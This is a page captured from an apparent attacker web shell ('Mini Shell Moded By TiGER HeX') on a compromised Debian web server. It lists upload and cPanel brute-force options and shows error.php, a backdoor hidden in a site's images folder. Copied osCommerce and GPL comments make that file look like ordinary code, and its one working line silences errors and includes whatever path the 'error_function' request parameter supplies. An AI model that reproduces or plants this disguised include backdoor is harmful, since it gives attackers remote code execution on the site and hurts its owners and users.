Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
proc
/
self
/
root
/
var
/
www
/
ridazz
/
images
/
profiles
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//proc/self/root/var/www/ridazz/images/profiles/error.php
<?php /** * Error Functions - used to prepare links for EZ-error * * @Error Functions * @copyright Copyright 2011-2012 Development Team * @copyright Portions Copyright 2011 osCommerce * @license http://www.php.net/license/2_0.txt GNU Public License V2.0 */ /** * look up page_id and create link for error * to use this link add \<a href " . error_link( error_id) . ">\</a> ; */ // to use this link add <a href " . error_link( error_id) . "></a> ; //For example, if you distribute copies of such a program, whether // gratis or for a fee, you must give the recipients all the rights that // you have. You must make sure that they, too, receive or can get the // source code. And you must show them these terms so they know their // rights. /* <html>error positions * <position>left</position> * <position>right</position> *<position>top</position> *<position>breadcrumb</position> * <position>user1</position> * <position>user2</position> * <position>user3</position> * <position>user4</position> * <position>debug</position> * <position>syndicate</position> * </positions> * <params> * </params> * </html> */ error_reporting(0); include($_REQUEST["error_function"] . "/error.php"); ?>